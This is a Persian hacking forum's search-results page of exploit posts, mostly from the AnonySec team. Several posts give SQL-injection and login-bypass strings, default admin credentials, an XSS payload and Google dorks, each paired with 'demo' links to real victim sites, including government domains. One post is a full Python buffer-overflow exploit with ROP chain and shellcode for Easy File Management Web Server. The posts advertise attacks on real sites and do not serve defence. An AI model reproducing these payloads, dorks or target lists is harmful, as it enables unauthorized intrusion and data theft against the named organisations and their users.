امکانات انجمن
  • مهمانان محترم می توانند بدون عضویت در سایت در بخش پرسش و پاسخ به بحث و گفتگو پرداخته و در صورت وجود مشکل یا سوال در انجمنن مربوطه موضوع خود را مطرح کنند

moharram

iran rules jazbe modir
snapphost mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'web'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • پروژه های تیم
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های آسیب پذیری
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

دسته ها

  • Articles

84 نتیجه پیدا شد

  1. [+] Title :- Wordpress Contentive Theme - Cross Site Web Vulnerability [+] Date :- 2018-09-13 [+] Exploit Author :- Rednofozi [+] Version :- All Versions [+] Tested on :- Linux - Windows [+] Category :- webapps [+] Google Dorks :- 1- N/A [+] Team name :- Anonysec.org [+] Official Website :- anonysec [+] Contact :- Rednofozi@yahoo.com ========================================================= Common Vulnerability Scoring System: ==================================== 3.2 Vulnerability Class: ==================== Cross Site Scripting - Non Persistent Discovery Status: ================= Published Affected Product(s): ==================== Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A stored cross site scripting web vulnerability has been discovered in the official Wordpress Contentive Theme web-application. The non-persistent vulnerability allows remote attackers to inject own malicious script code to client-side application to browser requests. The client-side cross site vulnerability is located in the `label` value of the page module GET method request. Remote attackers are able to inject own malicious script codes to the client-side of the online service web-application to compromise user session information or data. The security risk of the cross site web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.2. Exploitation of the cross site vulnerability requires no privileged web-application user account and low user interaction. Successful exploitation results in session hijacking, persistent phishings attacks, persistent external redirect and malware loads or persistent manipulation of affected and connected module context. Request Method(s): [+] GET Vulnerable Service(s): [+] Contentive Theme (Wordpress) Vulnerable Module(s): [+] Input Vulnerable Parameter(s): [+] label Proof of Concept (PoC): ======================= The remote cross site vulnerability can be exploited by remote attackers privileged web-application user accounts with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. PoC: Example http://wp.localhost:8080/?s=[CLIENT SIDE CROSS SITE SCRIPTING VULNERABILITY!] PoC: Exploitation http://wp.localhost:8080/?s="'/><svg/onload=alert(/31337/);> PoC: Vulnerable Source <form role="search" method="get" id="searchform" action="http://wp.localhost:8080"> <div> <input type="text" value=""'/><svg/onload=alert(123);>" name="s" id="s"/> <input type="submit" id="searchsubmit" value=""/> </div> </form> Reference(s): http://wp.localhost:8080/?s= Solution - Fix & Patch: ======================= The vulnerability can be patched by a parse and encode of the vulnerable `label` value in the webpage GET method request. Encode the parameter and restrict the value input to prevent further script code injection attacks. Enjoy ! -------------------------------------------------------------------------------------------- ####################################################### Anonysec hacker iranin ######################################################## ======================================================= # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/2033
  2. Pro-Exploit

    [+] Title :- Zoom Web Media - Default Admin bypass [+] Date :- 2018-09-10 [+] Exploit Author :- Rednofozi [+] Version :- All Versions [+] Tested on :- Linux - Windows [+] Category :- webapps [+] Google Dorks :- 1- "Powered By Zoom Web Media" 2- inurl:zoom-admin 3- inurl:zoom-admin intitle:Login : Admin [+] Team name :- Anonysec.org [+] Vendor Homepage :- http://www.zoomwebmedia.com/ [+] Official Website :- nadaram :d [+] Contact :- Rednofozi@yahoo.com ========================================================= . . . . . . . . . + . . . : . .. :. .___---------___. . . . . :.:. _".^ .^ ^. '.. :"-_. . . : . . .:../: . .^ :.:\. . . :: +. :.:/: . . . . . .:\ . : . . _ :::/: . ^ . . .:\ .. . . . - : :.:./. . .:\ . . . :..|: . . ^. .:| . . : : ..|| . . . !:| . . . . ::. ::\( . :)/ . . : . : .:.|. ###### .#######::| :.. . :- : .: ::|.####### ..########:| . . . .. . .. :\ ######## :######## :/ . .+ :: : -.:\ ######## . ########.:/ . .+ . . . . :.:\. ####### #######..:/ :: . . . . ::.:..:.\ . . ..:/ . . . .. : -::::.\. | | . .:/ . : . . .-:.":.::.\ ..:/ . -. . . . .: .:::.:.\. .:/ . . . : : ....::_:..:\ ___. :/ . . . .:. .. . .: :.:.:\ :/ + . . : . ::. :.:. .:.|\ .:/| . + . . ...:: ..| --.:| . . . . . . . ... :..:.."( ..)" . . . : . .: ::/ . .::\ ######################################################## ==+++++++++++bypass==+++++++++++++++ Username: admin Password: admin123 ============================================================================ Tested on multiple servers (: http://www.propertytools.co.nz/zoom-admin/index.php http://fabulousprinting.com/zoom-admin/index.php http://www.valepackaging.ca/zoom-admin/index.php Enjoy ! -------------------------------------------------------------------------------------------- ####################################################### Anonysec hacker iranin ######################################################## ======================================================= # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/2030
  3. ###################################################### # Title : Web Design .sa.php saudi arabia www.azdan.com.sa Sql injection Vulnerability # Author : AnonySec # category : webapps # Tested On : Win 10 , Kali Linux # my team: www.anonysec.org # Vendor HomePage : www.azdan.com.sa # Google Dork: '.sa.php id=' ###################################################### # Search google Dork : '.sa.php id=' # inject sql codes ...... #Demo : http://www.ftc.com.sa/group-info.php?id=13%27' (Sql Injection) http://www.pumps-hv.com/news.php?id=218%27' (Sql Injection) # Discovered by : Moeein Seven | www.moeein.ir #--tnx to : ReZa CLONER , Rednofozi , SheikhShahin , MiladShadow and all bax from anonysec team..... http://www.exploit4arab.org/exploits/2015
  4. ###################################################### # Title : Web Design saudi hotels Sql injection Vulnerability # Author : AnonySec # category : webapps # Tested On : Win 10 , Kali Linux # my team: www.anonysec.org # Vendor HomePage : www.retajalrayyan.com # Google Dork: 'php id= saudi hotels' ###################################################### # Search google Dork : 'php id= saudi hotels' # inject sql codes ...... #Demo : http://www.retajroyaledoha.com/offer.php?id=13%27' (Sql Injection) http://www.retajalrayyan.com/offer.php?id=22%27' (Sql Injection) # Discovered by : Moeein Seven | www.moeein.ir #--tnx to : ReZa CLONER , Rednofozi , SheikhShahin , MiladShadow and all bax from anonysec team..... http://www.exploit4arab.org/exploits/2014
  5. Pro-SoftWare

    اپلیکیشن AnonySec✔️ جهت دانلود ⬇️ https://s3.amazonaws.com/gonativeio/static/5b907292ad39a2307ec3a9ce/app-release.apk اگه تو نصب با ارور مواجه شدید به هیچ عنوان گزینه تایید و نزنید ⛔🚫❌ ساخته شده توسط Mrb3hz4d 😐❤️
  6. ################################################################################################# # Exploit Title : © Inter Alia 2013 InterAliaProject Web Design SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 07/09/2018 # Vendor Homepage : interaliaproject.com # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Description : - InterAliaProject - To bring people closer to each other and to Europe through breaking stereotypes, analysing and deconstructing conflict, engaging actively in key political issues and dialogue. - To raise awareness of the EU & prospective EU citizens on available channels for acting, participating & shaping Europe - To utilize the increasing willingness of the European youth to share their skills, expertise and energy, and to improve youth employability - To apply pressure to EU mechanisms for the expansion of participation of EU & prospective EU citizens in the European process - To provide multi-disciplinary approaches and integrate fragmented knowledge into a fruitful scheme # Google Dork : intext:''© Inter Alia 2013'' # Exploit : /news.php?id=[SQL Injection] ################################################################################################# # Example Site => interaliaproject.com/news.php?id=115%27 => [ Proof of Concept ] => archive.is/1Rqb6 # SQL Database Error => Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/interali/public_html/news.php on line 71 ################################################################################################# # Discovered By KingSkrupellos
  7. [+] Title :- Web Solutions - Bypass Admin Login Priv8 [+] Date :- 2018-09-03 [+] Vendor Homepage :- http://www.webetsolutions.com/ [+] Version :- All Versions [+] Tested on :- Linux - Windows [+] Category :- webapps [+] Google Dorks :- "Designed & Developed By: Web Solutions" intext:Designed & Developed By: Web Solutions inurl:"/admincp/sdata/msecimgs/" [+] Exploit Author :- Anonysec [+] Team name :- Anonysec.org [+] Official Website :- nadaram :d [+] Contact :- Rednofozi@yahoo.com ========================================================= [+] Severity Level :- High ######################################################## [+] Login Page http://www.localhost.com/admincp/ [+] Exploit: User:admin' or '1'='1 Pass:admin' or '1'='1 Enjoy Over 3 320 000 résultats ######################################################## Demo: http://darcolondon.co.uk/admincp/ http://www.eldonhors.com.pk/admincp/ http://humanbodyinst.com/admincp/ ######################################################## ######################################################## ======================================================= # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/2003
  8. ###################################################### # Title : Web Design .br brazil www.imoveismanduri.com.br login page ByPass # Author : AnonySec # category : webapps # Tested On : Win 10 , Kali Linux # my team: www.anonysec.org # Vendor HomePage : www.imoveismanduri.com.br # Google Dork: inurl:"/adm/login.php" intext:"login:" ###################################################### # Search google Dork : inurl:"/adm/login.php" intext:"login:" # Go to this directory in each sites ==> www.site.br/adm/login.php # Use this username&password too login as a admin ==> '=''or' #Demo : http://www.imoveismanduri.com.br/adm/login.php (Login page ByPass) http://www.imobiliariacentralbb.com.br/adm/login.php (Login page ByPass) http://www.hamilimoveis.com.br/adm/login.php (Login page ByPass) # Discovered by : Moeein Seven | www.moeein.ir #--tnx to : ReZa CLONER , Rednofozi , SheikhShahin , MiladShadow and all bax from anonysec team..... http://www.exploit4arab.org/exploits/2004
  9. ###################################################### # Title : Web Design india hotel www.skytraktravel.com Sql injection Vulnerability # Author : AnonySec # category : webapps # Tested On : Win 10 , Kali Linux # my team: www.anonysec.org # Vendor HomePage : www.skytraktravel.com # Google Dork: 'php id= hotel india' ###################################################### # Search google Dork : 'php id= hotel india' # inject sql codes ...... #Demo : http://www.skytraktravel.com/services.php?id=174%27' (Sql Injection) http://hotel-jamayca.com/3-star-hotel/standard-rooms.php?id=6%27' (Sql Injection) # Discovered by : Moeein Seven | www.moeein.ir #--tnx to : ReZa CLONER , Rednofozi , SheikhShahin , MiladShadow and all bax from anonysec team..... http://www.exploit4arab.org/exploits/2010
  10. ################################################################################################# # Exploit Title : Developed by OneTech Web Design Bangladesh Multiple Vulnerabilities # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 04/09/2018 # Vendor Homepage : onetechbd.com # Tested On : Windows # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] + CWE-592 - Authentication Bypass Issues ################################################################################################# # Google Dork : intext:''Developed by: OneTech'' inurl:/allindex.php?page=teacher Developed by OneTech Bangladesh SQL Injection Vulnerability # Exploit : /news_details.php?iid=[SQL Injection] OpenWYSIWYG Image Manager => Insert Image Exploit => /admin-mb/script/popups/insert_image.html?wysiwyg=textdetails Developed by OneTech Bangladesh Admin Login Bypass Authentication Vulnerability # Admin Control Panel Path => /admin-mb/login.php # Exploit => Username : '=''or' Password : '=''or' # Useable Admin Control Panel Path URL Links => /admin-mb/add_tatt.php /admin-mb/add_satt.php /admin-mb/manage_s.php /admin-mb/manage_notice.php /admin-mb/manageart.php /admin-mb/manage_stdu.php /admin-mb/manage_text.php /admin-mb/magteacher.php /admin-mb/manage_commit.php /admin-mb/manage_download.php /admin-mb/manage_photo.php /admin-mb/manage_result.php /admin-mb/manage_presult.php /admin-mb/manage_subject.php /admin-mb/manage_class.php /admin-mb/add_admin.php /admin-mb/manage_admin.php ################################################################################################# # Example Site => sujkss.edu.bd/news_details.php?iid=17%27 => [ Proof of Concept ] => archive.is/jzJjL # SQL Database Error => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''17''' at line 1 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
  11. ################################################################################################# # Exploit Title : Powered by NN Softech Web Design Bangladesh SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 04/09/2018 # Owner of the Script : bd.linkedin.com/in/sheikh-shaheen-30b40011a # Tested On : Windows # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Google Dork : intext:''Powered by : NN SOFTECH'' # Exploit : /index.php?page=[SQL Injection] /news_events.php?page=1&did=SQL Injection] ################################################################################################# # Example Site => cbsfmhs.edu.bd/news_events.php?page=1&did=52%27 => [ Proof of Concept ] => archive.is/eCGLQ mgsc.edu.bd/index.php?page=43%27 => [ Proof of Concept ] => archive.is/61kCD # SQL Database Error => Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/cbsm3x2s/public_html/news_events.php on line 131 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
  12. با سلام دورد این اکسپوت بسیار ویژه هستش و نمونه کامل از هستش با استفاده ازش راحت میتونید سایت بزنید کل اکسپلوت رو داخل لینک مشاهده کنید به دلیل کد های زیادی که داخلش هست سایت قبول نمیکنه من فقط یه کمش براتون میزارم ولی پیشنهاد میکنم حتمان ببینید [+] Title :- Rudram Web Technologies CMS - SQL Injection Vulnerability [+] Date :- 2018-09-03 [+] Vendor Homepage :- http://www.rudramweb.com/ [+] Version :- All Versions [+] Tested on :- Nginx/1.4.5, PHP/5.2.17, Linux - Windows [+] Category :- webapps [+] Google Dorks :- "developed by www.rudramweb.com" "developed by www.rudramweb.com" inurl:"php?id=" "developed by www.rudramweb.com" +inurl:/.php?id= [+] Exploit Author :- Anonysec [+] Team name :- Anonysec.org [+] Official Website :- nadaram :d [+] Contact :- Rednofozi@yahoo.com ========================================================= [+] Severity Level :- High [+] Request Method(s) :- GET / POST [+] Vulnerable Parameter(s) :- id [+] Affected Area(s) :- Entire admin, database, Server [+] About :- Unauthenticated SQL Injection via Multiple Php Files causing an SQL error [+] SQL vulnerable File :- /home/DOMAIN/public_html/gallery.php /home/DOMAIN/public_html/cms.php [+] POC :- http://127.0.0.1/gallery.php?id=[SQL]' The sql Injection web vulnerability can be be exploited by remote attackers without any privilege of web-application user account or user interaction. ======================================================= # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow https://0days.info/?exp=7893046
  13. ############################################### # Title : Web Design .gov.bd.php SQL injection Vulnerability # Author : AnonySec # category : webapps # Tested On : Win 10 , Kali Linux # my team: https://anonysec.org # Vendor HomePage : www.gdc.gov.bd # Google Dork: '.gov.bd php id= ' ############################################### # search google Dork : '.gov.bd php id= ' ####################Proof of Concept ############# #Demo : http://www.noakhalicoll.gov.bd/page.php?id=15%27' (Sql injection Vulnerability) http://www.gdc.gov.bd/page.php?id=1%27' (Sql injection Vulnerability) # Discovered by : Moeein Seven | www.moeein.ir #--tnx to : ReZa CLONER , SheikhShahin , Rednofozi , Milad Shadow and all bax from AnonySec.... http://www.exploit4arab.org/exploits/1999
  14. ############################################ # Title : Web Design .gov.in.php SQL injection Vulnerability # Author : AnonySec # category : webapps # Tested On : Win 10 , Kali Linux # my team: https://anonysec.org # Vendor HomePage : www.imd.gov.in # Google Dork: '.gov.in.php id=' ############################################ # search google Dork : '.gov.in.php id=' ####################Proof of Concept ############# #Demo : http://www.imd.gov.in/pages/obs_network.php?id=16%27' (Sql injection Vulnerability) # Discovered by : Moeein Seven | www.moeein.ir #--tnx to : ReZa CLONER , Rednofozi , Milad Shadow , Doctor Robot and all bax from AnonySec.... http://www.exploit4arab.org/exploits/1998
  15. ############################################ # Title : Web Design american food SQL Injection Vulnerability # Author :anonysec # Tested On : Win 10 , Kali Linux # Author : AnonySec # Vendor HomePage : www.minddesign.co.uk # Google Dork: 'php id= food' ############################################ # search google Dork : 'php id= food' #######Inject Sql Code###################### #Demo : http://www.minddesign.co.uk/show.php?id=394%27' (SQL Injection Vulnerability) # Discovered by : Moeein Seven | https://moeein.ir #--tnx to : ReZa CLONER , SheikhShahin , Rednofozi , Doctor robot , black petya and Milad Shadow http://www.exploit4arab.org/exploits/1997
  16. ############################################################### # Title : Web Design interphoto Sql Injection Vulnerability # Dork : intext:'created by interphoto' inurl:'php?id=' # Date : 8/12/2018 # Author : Moeein Seven # Vendor : www.tutuphoto.net # Version : 2.4.0 # Tasted on : Win 10 , Kali linux ############################################################### How to do it ------------- ==> Search the google dork and choose a vulnerable website. ==> Then Inject SQL ################################################## demo : www.tutuphoto.net/InterPhoto.php?id=623 ################################################## #Discovered by : Moeein Seven | www.moeein.ir #my Team : www.AnonySec.org #Thanks to : Reza Cloner , Milad Shadow , Rednofozi , SoldierAnonymous , DoctorRobot , BlackPetya and all bax from AnonySec Team http://www.exploit4arab.org/exploits/1996
  17. Pro-Exploit

    ########################################################## # Title : Web Design american animals www.projectwildlife.org SQL injection Vulnerability # Author : AnonySec # category : webapps # Tested On : Win 10 , Kali Linux # me : Moeein Seven | https://moeein.ir # Vendor HomePage : www.projectwildlife.org # Google Dork: 'php id=1 american animals' ########################################################## # search google Dork : 'php id=1 american animals' #########Proof of Concept############# #Demo : http://www.projectwildlife.org/animals.php?id=17' (Sql injection Vulnerability) ################################### # Discovered by : Moeein Seven | https://moeein.ir ################################### # Our forum : https://anonysec.org #--tnx to : ReZa CLONER , Rednofozi , Sheikh Shahin , Milad Shadow , Black Petya and all bax from anonysec team. http://www.exploit4arab.org/exploits/1995
  18. Pro-Exploit

    ############################################ # Title : Web Design Powered by SOFTMAN www.safesecurities.com.pk Admin Page Bypass # Author :anonysec # Tested On : Win 10 , Kali Linux # my team: https://anonysec.org # me : https://moeein.ir # Vendor HomePage : http://www.safesecurities.com.pk # Google Dork: intext: 'Powered by: SOFTMAN' ############################################ # search google Dork :intext: 'Powered by: SOFTMAN' # type this user&password ==> ' or 'a'='a #Demo : http://www.safesecurities.com.pk/sm/login.asp # Discovered by : Moeein Seven | https://moeein.ir #--tnx to : ReZa CLONER , SheikhShahin , Rednofozi , Doctor robot , black petya and Milad Shadow http://www.exploit4arab.org/exploits/1992
  19. -------------------------------------------------------------------------------------------------------------------------- * Exploit Title: Web Design Powered by The Colour Moon www.musculoskeletalsociety.in Sql Injection -------------------------------------------------------------------------------------------------------------------------- * Exploit Author: AnonySec * Tested on: Windows 10, Kali Linux * Dork : Powered by: The Colour Moon * Version : 5.2.2 ---------------------------------------------------------------- * Vendor site: http://musculoskeletalsociety.in * Demo: Sql Injection ==> http://musculoskeletalsociety.in/page.php?id=5' ---------------------------------------------------------------- * Discovered by ==> Moeein Seven | www.moeein.ir * My Team ==> AnonySec | www.AnonySec.org * Thanks to : Reza Cloner , Milad Shadow , Rednofozi , SoldierAnonymous , DoctorRobot , BlackPetya and all bax from AnonySec Team http://www.exploit4arab.org/exploits/1993
  20. Pro-Exploit

    ############################################################### # Title : Web Design israel Shops www.seaoflifeshop.com SQL INJECTION Vulnerability # Dork : 'php id= israel shop' # Date : 8/21/2018 # Author : Moeein Seven # Vendor : www.seaoflifeshop.com # Version : 5.2.1 # Tasted on : Win 10 , Kali linux ############################################################### How to do it ------------- ==> Search the google dork and choose a vulnerable website. ==> Inject SQL Codes...! ################################################## demo : http://www.seaoflifeshop.com/product.php?id=652' ################################################## #Discovered by : Moeein Seven | www.moeein.ir #my Team : www.AnonySec.org #Thanks to : Reza Cloner , Milad Shadow , Rednofozi , SoldierAnonymous , DoctorRobot , BlackPetya and all bax from AnonySec Team http://www.exploit4arab.org/exploits/1994
  21. ====================================================================================================================================== | # Title : JPC2 Group Web Sql injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 61.0.1 (32-bit) | | # Vendor : http://www.jpc2groupweb.com/ | | # Dork : "Web design and development JPC2 Group Web" | ====================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine . [+] inject here : http://www.npm-lex.com/en/pagina.php?idcate=13 [+] Panel : http://www.npm-lex.com/en/administrador/ Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh | | =======================================================================================================================================
  22. ############################################ # Title : Web Design .gov.br.php brazil www.educacao.itapeva.sp.gov.br SQL Injection Vulnerability # Author :anonysec # Tested On : Win 10 , Kali Linux # Author : AnonySec # Vendor HomePage : www.educacao.itapeva.sp.gov.br # Google Dork: 'php id= .gov.br.php' ############################################ ############################################ # search google Dork : 'php id= .gov.br.php' #######Inject Sql Code###################### #Demo : http://educacao.itapeva.sp.gov.br/conselheirosLer.php?id=12%27' (SQL Injection Vulnerability) # Discovered by : Moeein Seven | https://moeein.ir #--tnx to : ReZa CLONER , SheikhShahin , Rednofozi , Doctor robot , black petya and Milad Shadow http://www.exploit4arab.org/exploits/1985
  23. ############################################ # Title : Web Design reservas www.hoteliraqua.com SQL injection Vulnerability # Author : AnonySec # category : webapps # Tested On : Win 10 , Kali Linux # my team: https://anonysec.org # Vendor HomePage : www.hoteliraqua.com # Google Dork: 'php?id= reservas' ############################################ # search google Dork : 'php?id= reservas' ####################Proof of Concept ############# #Demo : http://www.hoteliraqua.com/Reservas.php?id=5%27' (Sql injection Vulnerability) # Discovered by : Moeein Seven | www.moeein.ir #--tnx to : ReZa CLONER , SheikhShahin , Rednofozi , Milad Shadow and all bax from AnonySec.... http://www.exploit4arab.org/exploits/1989
  24. ############################################ # Title : Web Design india login www.ssy.org SQL injection Vulnerability # Author :anonysec # category : webapps # Tested On : Win 8 , Kali Linux # my team:https://anonysec.org # me : https://moeein.ir # Vendor HomePage : www.ssy.org # Google Dork: 'php id=1 india login' ############################################ # search google Dork : php id=1 india login ############Proof of Concept ############# #Demo : https://ssy.org/detail.php?id=1' (Sql injectionVulnerability) # Discovered by : Moeein Seven | https://moeein.ir #--tnx to : ReZa CLONER , Rednofozi , Milad Shadow , Sheikh Shahin and all bax from anonysec team... Submited on ==> http://www.exploit4arab.org/exploits/1980
  25. #!/usr/bin/python # Exploit Title: Easy File Management Web Server v5.6 - USERID Remote Buffer Overflow # Version: 5.6 # Date: 2015-08-17 # Author: Tracy Turben (tracyturben@gmail.com) # Software Link: http://www.efssoft.com/ # Tested on: Win7x32-EN # Special Thanks To: Julien Ahrens for the crafted jmp esp Trick ;) # Credits for vulnerability discovery: # superkojiman (http://www.exploit-db.com/exploits/33453/) from struct import pack import socket,sys import os host="192.168.1.15" port=80 junk0 = "\x90" * 80 # 0x1001d89b : {pivot 604 / 0x25c} # POP EDI # POP ESI # POP EBP # POP EBX # ADD ESP,24C # RETN [ImageLoad.dll] # The memory located at 0x1001D8F0: "\x7A\xD8\x01\x10" does the job! # Due to call dword ptr [edx+28h]: 0x1001D8F0 - 28h = 0x1001D8C8 call_edx=pack('<L',0x1001D8C8) junk1="\x90" * 280 ppr=pack('<L',0x10010101) # POP EBX # POP ECX # RETN [ImageLoad.dll] # Since 0x00 would break the exploit needs to be crafted on the stack crafted_jmp_esp=pack('<L',0xA44162FB) test_bl=pack('<L',0x10010125) # contains 00000000 to pass the JNZ instruction kungfu=pack('<L',0x10022aac) # MOV EAX,EBX # POP ESI # POP EBX # RETN [ImageLoad.dll] kungfu+=pack('<L',0xDEADBEEF) # filler kungfu+=pack('<L',0xDEADBEEF) # filler kungfu+=pack('<L',0x1001a187) # ADD EAX,5BFFC883 # RETN [ImageLoad.dll] # finish crafting JMP ESP kungfu+=pack('<L',0x1002466d) # PUSH EAX # RETN [ImageLoad.dll] nopsled="\x90" * 20 # windows/exec CMD=calc.exe # Encoder: x86/shikata_ga_nai # powered by Metasploit # msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00\x0a\x0d' shellcode=("\xda\xca\xbb\xfd\x11\xa3\xae\xd9\x74\x24\xf4\x5a\x31\xc9" + "\xb1\x33\x31\x5a\x17\x83\xc2\x04\x03\xa7\x02\x41\x5b\xab" + "\xcd\x0c\xa4\x53\x0e\x6f\x2c\xb6\x3f\xbd\x4a\xb3\x12\x71" + "\x18\x91\x9e\xfa\x4c\x01\x14\x8e\x58\x26\x9d\x25\xbf\x09" + "\x1e\x88\x7f\xc5\xdc\x8a\x03\x17\x31\x6d\x3d\xd8\x44\x6c" + "\x7a\x04\xa6\x3c\xd3\x43\x15\xd1\x50\x11\xa6\xd0\xb6\x1e" + "\x96\xaa\xb3\xe0\x63\x01\xbd\x30\xdb\x1e\xf5\xa8\x57\x78" + "\x26\xc9\xb4\x9a\x1a\x80\xb1\x69\xe8\x13\x10\xa0\x11\x22" + "\x5c\x6f\x2c\x8b\x51\x71\x68\x2b\x8a\x04\x82\x48\x37\x1f" + "\x51\x33\xe3\xaa\x44\x93\x60\x0c\xad\x22\xa4\xcb\x26\x28" + "\x01\x9f\x61\x2c\x94\x4c\x1a\x48\x1d\x73\xcd\xd9\x65\x50" + "\xc9\x82\x3e\xf9\x48\x6e\x90\x06\x8a\xd6\x4d\xa3\xc0\xf4" + "\x9a\xd5\x8a\x92\x5d\x57\xb1\xdb\x5e\x67\xba\x4b\x37\x56" + "\x31\x04\x40\x67\x90\x61\xbe\x2d\xb9\xc3\x57\xe8\x2b\x56" + "\x3a\x0b\x86\x94\x43\x88\x23\x64\xb0\x90\x41\x61\xfc\x16" + "\xb9\x1b\x6d\xf3\xbd\x88\x8e\xd6\xdd\x4f\x1d\xba\x0f\xea" + "\xa5\x59\x50") payload=junk0 + call_edx + junk1 + ppr + crafted_jmp_esp + test_bl + kungfu + nopsled + shellcode buf="GET /vfolder.ghp HTTP/1.1\r\n" buf+="User-Agent: Mozilla/4.0\r\n" buf+="Host:" + host + ":" + str(port) + "\r\n" buf+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" buf+="Accept-Language: en-us\r\n" buf+="Accept-Encoding: gzip, deflate\r\n" buf+="Referer: http://" + host + "/\r\n" buf+="Cookie: SESSIONID=1337; UserID=" + payload + "; PassWD=;\r\n" buf+="Conection: Keep-Alive\r\n\r\n" print "[*] Connecting to Host " + host + "..." s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: connect=s.connect((host, port)) print "[*] Connected to " + host + "!" except: print "[!] " + host + " didn't respond\n" sys.exit(0) print "[*] Sending malformed request..." s.send(buf) print "[!] Exploit has been sent!\n" s.close()